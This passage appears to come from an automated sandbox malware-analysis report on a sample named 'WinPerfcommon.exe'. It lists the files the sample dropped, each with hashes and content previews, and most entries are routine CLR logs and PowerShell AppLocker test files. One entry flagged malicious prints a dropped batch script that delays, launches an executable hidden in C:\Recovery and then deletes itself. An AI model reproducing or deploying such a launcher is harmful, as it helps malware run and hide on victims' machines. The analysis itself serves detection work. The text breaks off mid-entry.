                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\StartMenuExperienceHost.exe.log

                                                                                    Download File
                                                                                    Process:C:\Program Files\Adobe\StartMenuExperienceHost.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):847
                                                                                    Entropy (8bit):5.354334472896228
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WinPerfcommon.exe.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1396
                                                                                    Entropy (8bit):5.350961817021757
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                    Malicious:true
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\pzPgKRlGoglDaRzDTBMXwbN.exe.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1830
                                                                                    Entropy (8bit):5.3661116947161815
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
                                                                                    MD5:C2E0F17D6A14A9837FE55EE183305037
                                                                                    SHA1:EB56F87DAE280A52D91E88872777FDEEB2E1DF76
                                                                                    SHA-256:8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
                                                                                    SHA-512:F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1940658735648508
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlllulbnolz:NllUc
                                                                                    MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                    SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                    SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                    SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                    Malicious:false
                                                                                    Preview:@...e................................................@..........

                                                                                    C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WinPerfcommon.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):215
                                                                                    Entropy (8bit):5.320179041964886
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:hCijTg3Nou1SV+DE7gCvE5C4SKOZG1wkn23fJ5G:HTg9uYDE7gufxU
                                                                                    MD5:EC4A01BFD3E61C649FB5C15129C5C269
                                                                                    SHA1:B1D3FE7F0FD7D2B1EEC031B523821FB2987D8350
                                                                                    SHA-256:0CC7FCFAFCA6A78B119C060AFD8229E80B340792F8526DC39764C73B14541B5B
                                                                                    SHA-512:A0652433BE68EE99223B916B7526CD6BF755C8789472C28EC7F7575E1D8A8A1FFC2ECA55B31993296469D5E4E3B4B85A554D049485203602E381ABA8A576AC53
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\BUc8lPV5KF.bat"

                                                                                    C:\Users\user\AppData\Local\Temp\RESA39D.tmp

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sat Jan 11 16:45:14 2025, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1956
                                                                                    Entropy (8bit):4.556018538440599
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HKO9/OGRktDfHYwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:K8kxHKhmMluOulajfqXSfbNtmh1Z
                                                                                    MD5:D851788211453B0F1546E9E0981C1503
                                                                                    SHA1:F4E8E6AB4FBF4187FEB5B1EB5363E718206B10B8
                                                                                    SHA-256:8ED2DCE6BA3C5D53B9915978164FBDEA0EF6FF45D174B4F6714C5EA6D08B36F6
                                                                                    SHA-512:4492ED265DFEC2F0B52231B96ABC21460775E557D63AD230435F415A7799115FF97DE19A6A40CF44A8EC1FFA88C7A267D3A0E974C3573D6456AF22323A856D3B
                                                                                    Malicious:false
                                                                                    Preview:L......g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESA39D.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dblzxkj.cjz.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0npazikq.dwi.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2nx01f2y.hhn.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3w3xkecv.yzz.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4iknbrpn.egg.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bs1ai5i1.jtj.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cz40faep.d0h.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbdob4i0.tcc.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffmhb2li.yu2.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fjoqloid.kf1.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuui2aqd.sl2.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4qvltt4.goe.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqyvz2r5.o1f.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxmgnmbd.g0q.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njyxz05u.a2z.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrb32j5h.mwj.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owyfrrvp.54n.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgsgesmc.reg.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
